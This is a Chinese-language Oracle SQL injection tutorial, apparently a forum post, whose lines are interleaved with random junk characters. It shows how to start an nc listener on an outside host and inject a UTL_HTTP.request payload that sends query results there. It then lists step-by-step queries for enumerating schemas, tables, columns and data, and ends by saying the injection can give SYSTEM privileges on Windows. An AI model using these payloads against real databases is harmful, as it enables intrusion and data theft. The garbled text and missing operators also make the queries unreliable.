首先外网nc监听对应的端口 . E; K7 \' h7 Q1 ?
and UTL_HTTP.request("外网ip:port/"(sql语句))=1--
% j0 g% t+ p c5 h. N 爆库
F# L* z/ H! L$ S' \$ N/ J# M+ W select owner from all_tables where rownum=1 # N" e, D' [4 |8 f% l( s8 N, m, T
select owner from all_tables where owner"第一个库名" ( Q( ~' o( H& S7 Z0 L/ n
! `6 }' F0 J+ |/ s5 U6 | and rownum=1
9 G, T3 }3 J( K& o$ U select owner from all_tables where owner"第一个库名" , ^' x& g& s$ B) ]8 x/ N9 M% Q/ |7 ^2 e
and owner"第二个"and rownum=1
/ p6 f9 M* s6 }# A' K, t f select owner from all_tables where owner"第一个库名"
( j7 h+ _& ]) P0 `; L& |0 C/ O and owner"第一个库名" and rownum=1
2 k6 j4 m; m: E0 |; c& L5 H p 以此论推 2 K3 o4 q. `2 A+ c5 j
爆表
# M- Z: {8 l0 e" P# ^" K) Z select TABLE_NAME from all_tables where owner="库名" : U! K% g2 ^8 t. N h
and rownum=1
& g8 i5 P: `) U6 I' n& X( E8 L6 g select TABLE_NAME from all_tables where owner="库名"
5 u4 w* y4 E$ l8 e4 K8 y7 | and rownum=1 and TABLE_NAME"表名1"
4 c/ n' L: t' |% v select TABLE_NAME from all_tables where owner="库名"andrownum=1 - d9 b. H$ r$ i$ p4 M. Z
and TABLE_NAME"表名1" and TABLE_NAME"表名2" 3 t6 k a# m1 X( {. x
以此论推
* @5 @% B4 M& m) x3 Q6 j" I 爆列
' _+ `' \7 G3 }& |) H select COLUMN_NAME from user_tab_columns wheretable_name="表名" ( x2 Z, X5 e e1 C7 S& `) @5 W
and rownum=1 % `: W+ t% v$ x4 T7 {
select COLUMN_NAME from user_tab_columns wheretable_name="表名"
" l0 ]9 e# o8 k4 \# [/ s' T$ ]& [4 Y and rownum=1 and COLUMN_NAME"第一个爆出的列名" " U1 E% W# I0 |8 S4 P
select COLUMN_NAME from user_tab_columns wheretable_name="表名" 2 f, A, m( [ k' G0 `. y- s" \% L) e
and rownum=1 and COLUMN_NAME"第一个爆出的列名"andCOLUMN_NAME"第二个爆出的列名"
; s `7 R* D9 E0 n; _4 g 爆内容 1 Y3 h. X5 S4 C1 s
第一个内容:select 列名 from 表名 where rownum=1
9 R# S" r, c3 V7 w$ r) N 第二个内容:select 列名 from 表名 where rownum=1 and 列名"第一个值" a# Z+ Y3 |7 b7 U- v
第三个内容:select 列名 from 表名 where rownum=1 and 列名"第一个值"and列名"第二个值" - t& D2 M& N$ K7 ^
以此论推
1 U6 k4 v p) z/ W2 t 注
) P$ q8 N* B! w$ K2 b8 J' M0 b7 [ 1:在windows环境下,oracle是以服务的形式启动的,这样通过web注射就可以直接获得system权限(此部分内容正在整理测试阶段中,以供给大家更直观、简洁、有效的参考资料 2:针对unix和linux操作系统方面对于Oracle也会作出分析,相信Oracle注射将会成为转入高级Hack入侵的桥梁。 |